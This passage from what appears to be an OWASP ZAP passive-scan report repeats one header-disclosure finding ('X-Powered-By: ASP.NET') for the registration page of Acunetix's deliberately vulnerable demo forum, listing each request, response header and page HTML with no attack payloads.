<td>Email:</td> <td align="right"><input name="tfEmail" type="text" id="tfEmail" class="Login"></td> </tr> <tr> <td>Password:</td> <td align="right"><input name="tfUPass" type="password" id="tfUPass" class="Login"></td> </tr> <tr> <td> </td> <td align="right"><input type="submit" value="Register me"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D11 |
| Method | GET |
| Parameter | |
| Attack | |
| Evidence | X-Powered-By: ASP.NET |
| Request Header - size: 368 bytes. |
GET http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D11 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showthread.asp?id=11 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:52 GMT Content-Length: 3551 |
| Response Body - size: 3,551 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum register</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D11" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form action="" method="post" enctype="application/x-www-form-urlencoded" name="frmRegister"> <table width="350" border="0" align="center" cellpadding="0" cellspacing="5" class="FramedForm"> <tr> <td>Username:</td> <td align="right"><input name="tfUName" type="text" id="tfUName" class="Login"></td> </tr> <tr> <td>Real name:</td> <td align="right"><input name="tfRName" type="text" id="tfRName" class="Login"></td> </tr> <tr> <td>Email:</td> <td align="right"><input name="tfEmail" type="text" id="tfEmail" class="Login"></td> </tr> <tr> <td>Password:</td> <td align="right"><input name="tfUPass" type="password" id="tfUPass" class="Login"></td> </tr> <tr> <td> </td> <td align="right"><input type="submit" value="Register me"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D12 |
| Method | GET |
| Parameter | |
| Attack | |
| Evidence | X-Powered-By: ASP.NET |
| Request Header - size: 368 bytes. |
GET http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D12 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showthread.asp?id=12 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:52 GMT Content-Length: 3551 |
| Response Body - size: 3,551 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum register</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D12" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form action="" method="post" enctype="application/x-www-form-urlencoded" name="frmRegister"> <table width="350" border="0" align="center" cellpadding="0" cellspacing="5" class="FramedForm"> <tr> <td>Username:</td> <td align="right"><input name="tfUName" type="text" id="tfUName" class="Login"></td> </tr> <tr> <td>Real name:</td> <td align="right"><input name="tfRName" type="text" id="tfRName" class="Login"></td> </tr> <tr> <td>Email:</td> <td align="right"><input name="tfEmail" type="text" id="tfEmail" class="Login"></td> </tr> <tr> <td>Password:</td> <td align="right"><input name="tfUPass" type="password" id="tfUPass" class="Login"></td> </tr> <tr> <td> </td> <td align="right"><input type="submit" value="Register me"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D13 |
| Method | GET |
| Parameter | |
| Attack | |
| Evidence | X-Powered-By: ASP.NET |
| Request Header - size: 368 bytes. |
GET http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D13 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showthread.asp?id=13 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:52 GMT Content-Length: 3551 |
| Response Body - size: 3,551 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum register</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D13" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form action="" method="post" enctype="application/x-www-form-urlencoded" name="frmRegister"> <table width="350" border="0" align="center" cellpadding="0" cellspacing="5" class="FramedForm"> <tr> <td>Username:</td> <td align="right"><input name="tfUName" type="text" id="tfUName" class="Login"></td> </tr> <tr> <td>Real name:</td> <td align="right"><input name="tfRName" type="text" id="tfRName" class="Login"></td> </tr> <tr> <td>Email:</td> <td align="right"><input name="tfEmail" type="text" id="tfEmail" class="Login"></td> </tr> <tr> <td>Password:</td> <td align="right"><input name="tfUPass" type="password" id="tfUPass" class="Login"></td> </tr> <tr> <td> </td> <td align="right"><input type="submit" value="Register me"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D14 |
| Method | GET |
| Parameter | |
| Attack | |
| Evidence | X-Powered-By: ASP.NET |
| Request Header - size: 368 bytes. |
GET http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D14 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showthread.asp?id=14 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:53 GMT Content-Length: 3551 |
| Response Body - size: 3,551 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum register</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D14" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form action="" method="post" enctype="application/x-www-form-urlencoded" name="frmRegister"> <table width="350" border="0" align="center" cellpadding="0" cellspacing="5" class="FramedForm"> <tr> <td>Username:</td> <td align="right"><input name="tfUName" type="text" id="tfUName" class="Login"></td> </tr> <tr> <td>Real name:</td> <td align="right"><input name="tfRName" type="text" id="tfRName" class="Login"></td> </tr> <tr> <td>Email:</td> <td align="right"><input name="tfEmail" type="text" id="tfEmail" class="Login"></td> </tr> <tr> <td>Password:</td> <td align="right"><input name="tfUPass" type="password" id="tfUPass" class="Login"></td> </tr> <tr> <td> </td> <td align="right"><input type="submit" value="Register me"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D15 |
| Method | GET |
| Parameter | |
| Attack | |
| Evidence | X-Powered-By: ASP.NET |
| Request Header - size: 368 bytes. |
GET http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D15 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showthread.asp?id=15 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:53 GMT Content-Length: 3551 |
| Response Body - size: 3,551 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum register</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D15" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form action="" method="post" enctype="application/x-www-form-urlencoded" name="frmRegister"> <table width="350" border="0" align="center" cellpadding="0" cellspacing="5" class="FramedForm"> <tr> <td>Username:</td> <td align="right"><input name="tfUName" type="text" id="tfUName" class="Login"></td> </tr> <tr> <td>Real name:</td> <td align="right"><input name="tfRName" type="text" id="tfRName" class="Login"></td> </tr> <tr> <td>Email:</td> <td align="right"><input name="tfEmail" type="text" id="tfEmail" class="Login"></td> </tr> <tr> <td>Password:</td> <td align="right"><input name="tfUPass" type="password" id="tfUPass" class="Login"></td> </tr> <tr> <td> </td> <td align="right"><input type="submit" value="Register me"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D16 |
| Method | GET |
| Parameter | |
| Attack | |
| Evidence | X-Powered-By: ASP.NET |
| Request Header - size: 368 bytes. |
GET http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D16 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showthread.asp?id=16 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:53 GMT Content-Length: 3551 |
| Response Body - size: 3,551 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum register</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D16" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form action="" method="post" enctype="application/x-www-form-urlencoded" name="frmRegister"> <table width="350" border="0" align="center" cellpadding="0" cellspacing="5" class="FramedForm"> <tr> <td>Username:</td> <td align="right"><input name="tfUName" type="text" id="tfUName" class="Login"></td> </tr> <tr> <td>Real name:</td> <td align="right"><input name="tfRName" type="text" id="tfRName" class="Login"></td> </tr> <tr> <td>Email:</td> <td align="right"><input name="tfEmail" type="text" id="tfEmail" class="Login"></td> </tr> <tr> <td>Password:</td> <td align="right"><input name="tfUPass" type="password" id="tfUPass" class="Login"></td> </tr> <tr> <td> </td> <td align="right"><input type="submit" value="Register me"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D17 |
| Method | GET |
| Parameter | |
| Attack | |
| Evidence | X-Powered-By: ASP.NET |
| Request Header - size: 368 bytes. |
GET http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D17 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showthread.asp?id=17 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:53 GMT Content-Length: 3551 |
| Response Body - size: 3,551 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum register</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D17" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form action="" method="post" enctype="application/x-www-form-urlencoded" name="frmRegister"> <table width="350" border="0" align="center" cellpadding="0" cellspacing="5" class="FramedForm"> <tr> <td>Username:</td> <td align="right"><input name="tfUName" type="text" id="tfUName" class="Login"></td> </tr> <tr> <td>Real name:</td> <td align="right"><input name="tfRName" type="text" id="tfRName" class="Login"></td> </tr> <tr> <td>Email:</td> <td align="right"><input name="tfEmail" type="text" id="tfEmail" class="Login"></td> </tr> <tr> <td>Password:</td> <td align="right"><input name="tfUPass" type="password" id="tfUPass" class="Login"></td> </tr> <tr> <td> </td> <td align="right"><input type="submit" value="Register me"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D18 |
| Method | GET |
| Parameter | |
| Attack | |
| Evidence | X-Powered-By: ASP.NET |
| Request Header - size: 368 bytes. |
GET http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D18 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showthread.asp?id=18 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:54 GMT Content-Length: 3551 |
| Response Body - size: 3,551 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum register</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D18" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form action="" method="post" enctype="application/x-www-form-urlencoded" name="frmRegister"> <table width="350" border="0" align="center" cellpadding="0" 